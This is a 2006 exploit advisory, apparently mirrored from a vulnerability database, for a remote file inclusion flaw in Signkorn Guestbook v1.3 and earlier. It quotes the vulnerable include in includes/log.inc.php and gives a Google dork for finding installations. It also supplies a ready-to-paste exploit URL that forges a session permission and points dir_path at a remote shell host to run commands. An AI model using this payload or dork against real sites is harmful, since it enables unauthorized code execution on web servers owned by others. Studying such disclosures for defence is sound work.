Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14255
HistorySep 13, 2006 - 12:00 a.m.

Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit

2006-09-1300:00:00
vulners.com
79

#==============================================================================================
#Signkorn Guestbook <= v1.3 (dir_path) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://warez.gtasoft.ru/skripts/SignKorn.Guestbook.&#40;SL&#41;.v1.1.PHP.NULL-DGT.zip

#Version : v1.3 & all versions bellow

#================================================================================================

#Dork : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"

#================================================================================================
#Bug in : includes/log.inc.php

#Vlu Code :
#--------------------------------

if ($_SESSION['permission'] == "yes") {

// ########### Admin Menu

include($dir_path . '/includes/admin.menu.inc.php');

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/includes/log.inc.php?_SESSION[permission]=yes&dir_path=http://SHELLURL.COM?&amp;cmd=id

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : CCtream - Cyper-worrier team

Special Thx To : Str0ke & simoo

==================================================================================================